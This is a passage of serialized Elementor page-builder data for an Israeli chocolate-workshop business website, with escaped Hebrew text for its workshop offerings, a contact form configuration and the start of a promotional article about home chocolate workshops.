\\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-kids\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"59b08ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"661603b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_243662986_s-2019-1.jpg\",\"id\":413},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd\",\"description_text\":\"\\u05db\\u05d9 \\u05d0\\u05d9\\u05df \\u05d2\\u05d9\\u05dc \\u05dc\\u05e9\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d2\\u05dd \\u05dc\\u05e0\\u05d5 \\u05d4\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05de\\u05d5\\u05ea\\u05e8 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea \\u05d1\\u05d4 \\u05e0\\u05db\\u05d9\\u05df \\u05d3\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05e0\\u05d8\\u05e2\\u05dd \\u05d5\\u05e0\\u05dc\\u05de\\u05d3 \\u05e2\\u05dc \\u05d4\\u05d3\\u05d1\\u05e8 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4 \\u05e9\\u05e0\\u05e7\\u05e8\\u05d0 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/adult-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4b95460\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0c0b4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_62137823_s-2019-1.jpg\",\"id\":414},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"description_text\":\" \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05dc\\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7\\u05d5 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05d2\\u05dd \\u05db\\u05de\\u05ea\\u05e0\\u05d4 \\u05d0\\u05d5 \\u05db\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d4 \\u05d1\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-couples\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7b7ce5f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5817cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7a1d0cb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_53956819_s-2019-1.jpg\",\"id\":416},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"description_text\":\"\\u05d4\\u05d7\\u05d1\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05de\\u05ea\\u05d7\\u05ea\\u05e0\\u05ea \\u05d5\\u05d0\\u05ea \\u05de\\u05d0\\u05e8\\u05d2\\u05e0\\u05ea \\u05dc\\u05d4 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d8\\u05e8\\u05e7\\u05e6\\u05d9\\u05d4 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05e0\\u05db\\u05d5\\u05df, \\u05e0\\u05de\\u05d0\\u05e1 \\u05de\\u05db\\u05dc \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e0\\u05d3\\u05d5\\u05e9\\u05d5\\u05ea \\u05d5\\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d7\\u05d3\\u05e9. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea  \\u05dc\\u05d2\\u05d5\\u05d5\\u05df  \\u05d0\\u05ea \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e9\\u05d2\\u05e8\\u05ea\\u05d9\\u05d5\\u05ea \\u05d5\\u05de\\u05d1\\u05d8\\u05d9\\u05d7\\u05d4 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d9\\u05d4 \\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05ea \\u05dc\\u05db\\u05dc\\u05d4 \\u05dc\\u05e2\\u05ea\\u05d9\\u05d3 \\u05d5\\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-bachelorette-party\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"ce1b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23fa8d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_247319794_s-2019-1.jpg\",\"id\":418},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05e2\\u05d3\\u05ea \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d9\\u05d5\\u05dd \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05d0\\u05d5 \\u05e2\\u05e8\\u05d1 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05db\\u05d9\\u05d9\\u05e4\\u05d9 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05de\\u05e8\\u05d2\\u05e9\\u05ea \\u05d5\\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05d7\\u05ea.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/?page_id=100\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"3a32e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a0f0677\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_72660625_s-2019-1.jpg\",\"id\":420},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05dc\\u05d4\\u05e4\\u05d9\\u05e7 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05de\\u05d1\\u05dc\\u05d9 \\u05dc\\u05e6\\u05d0\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05ea. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea, \\u05e2\\u05e8\\u05d1\\u05d9 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9, \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05e2\\u05d5\\u05d3. \\u05d4\\u05e6\\u05d9\\u05d5\\u05d3 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05dc\\u05db\\u05dd \\u05e0\\u05e9\\u05d0\\u05e8 \\u05e8\\u05e7 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/home-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f4d3ed\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#000000\",\"background_color_b\":\"#692910\"},\"elements\":[{\"id\":\"174e916\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8132cb7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e8\\u05d5\\u05e6\\u05d4 \\u05e9\\u05e4\\u05e9\\u05d5\\u05d8 \\u05e0\\u05d7\\u05d6\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d9\\u05da \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05e4\\u05e8\\u05d8\\u05d9\\u05dd?\",\"align\":\"center\",\"title_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"115d6a7\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d7\\u05d3\\u05e9\",\"form_fields\":[{\"custom_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"33\",\"_id\":\"11ed1fb\",\"required\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"custom_id\":\"email\",\"field_type\":\"tel\",\"required\":\"true\",\"field_label\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"placeholder\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"width\":\"33\",\"_id\":\"f7dd8de\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d9\\u05d7\\u05d4\",\"button_size\":\"md\",\"button_width\":\"33\",\"selected_button_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"},\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocolate4u.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocolate4u.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"\\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e0\\u05e9\\u05dc\\u05d7 \\u05d1\\u05d4\\u05e6\\u05dc\\u05d7\\u05d4.\",\"error_message\":\"\\u05d4\\u05ea\\u05e8\\u05d7\\u05e9\\u05d4 \\u05e9\\u05d2\\u05d9\\u05d0\\u05d4.\",\"required_field_message\":\"\\u05e9\\u05d3\\u05d4 \\u05d6\\u05d4 \\u05d4\\u05d5\\u05d0 \\u05e9\\u05d3\\u05d4 \\u05d7\\u05d5\\u05d1\\u05d4.\",\"invalid_message\":\"\\u05de\\u05e9\\u05d4\\u05d5 \\u05d4\\u05e9\\u05ea\\u05d1\\u05e9. \\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d0\\u05d9\\u05e0\\u05d5 \\u05d7\\u05d5\\u05e7\\u05d9.\",\"button_text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"form\"},{\"id\":\"d555ad1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c65b0d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c6b8474\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"30c64bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05dc\\u05d3, \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05e2\\u05d5\\u05dc\\u05dd\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"56c7701\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05d9\\u05d5\\u05de\\u05d9 \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05de\\u05d4\\u05d8\\u05e2\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e2\\u05dc \\u05d4\\u05dc\\u05e9\\u05d5\\u05df. \\u05d7\\u05dc\\u05e7 \\u05dc\\u05d0 \\u05e7\\u05d8\\u05df \\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05df \\u05d3\\u05d5\\u05d5\\u05e7\\u05d0 \\u05dc\\u05d3\\u05e2\\u05ea \\u05d0\\u05d9\\u05da \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e0\\u05db\\u05d5\\u05e0\\u05d4 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d9\\u05d5\\u05e7\\u05e8\\u05ea\\u05d9 \\u05d4\\u05d6\\u05d4, \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d0\\u05d9\\u05da \\u05d4\\u05db\\u05d9 \\u05e0\\u05db\\u05d5\\u05df \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d5\\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05de\\u05de\\u05e0\\u05d5 \\u05d9\\u05e6\\u05d9\\u05e8\\u05d5\\u05ea \\u05d9\\u05e4\\u05d9\\u05e4\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d2\\u05dd \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05dc\\u05d8\\u05e4\\u05dc \\u05d1\\u05d5 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05de\\u05e0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d9\\u05ea\\u05e8\\u05de\\u05d5 \\u05dc\\u05d8\\u05e2\\u05dd \\u05d4\\u05db\\u05dc\\u05dc\\u05d9 \\u05e9\\u05dc \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05de\\u05d4 \\u05d6\\u05d4 \\u05d0\\u05d5\\u05de\\u05e8?<\\/h2><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d4 \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d0\\u05e6\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea.<br \\/>\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d0\\u05d5\\u05e8\\u05e2, \\u05dc\\u05d0\\u05d5\\u05e4\\u05d9 \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d5\\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e2\\u05e6\\u05de\\u05d4 (\\u05dc\\u05de\\u05e9\\u05dc, \\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d1\\u05d1\\u05d9\\u05ea \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05e2\\u05d5\\u05d3), \\u05d1\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05db\\u05d9\\u05e6\\u05d3 \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05de\\u05e7\\u05e8\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05d5\\u05de\\u05d5\\u05e6\\u05e8\\u05d9 \\u05d4\\u05d0\\u05e4\\u05d9\\u05d4 \\u05e9\\u05d9\\u05e9 \\u05d1\\u05db\\u05dc \\u05d0\\u05e8\\u05d5\\u05df, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05e9\\u05d9\\u05de\\u05d9\\u05dd \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd.<\\/p><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05dc\\u05d0 \\u05e6\\u05e8\\u05d9\\u05da \\u05d4\\u05db\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d5\\u05dc\\u05d0 \\u05ea\\u05d0\\u05dc\\u05e6\\u05d5 \\u05dc\\u05e8\\u05db\\u05d5\\u05e9 \\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05d9\\u05d5\\u05d7\\u05d3.<br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea, \\u05dc\\u05ea\\u05e0\\u05d5\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05dc\\u05de\\u05d9\\u05e7\\u05e1\\u05e8, 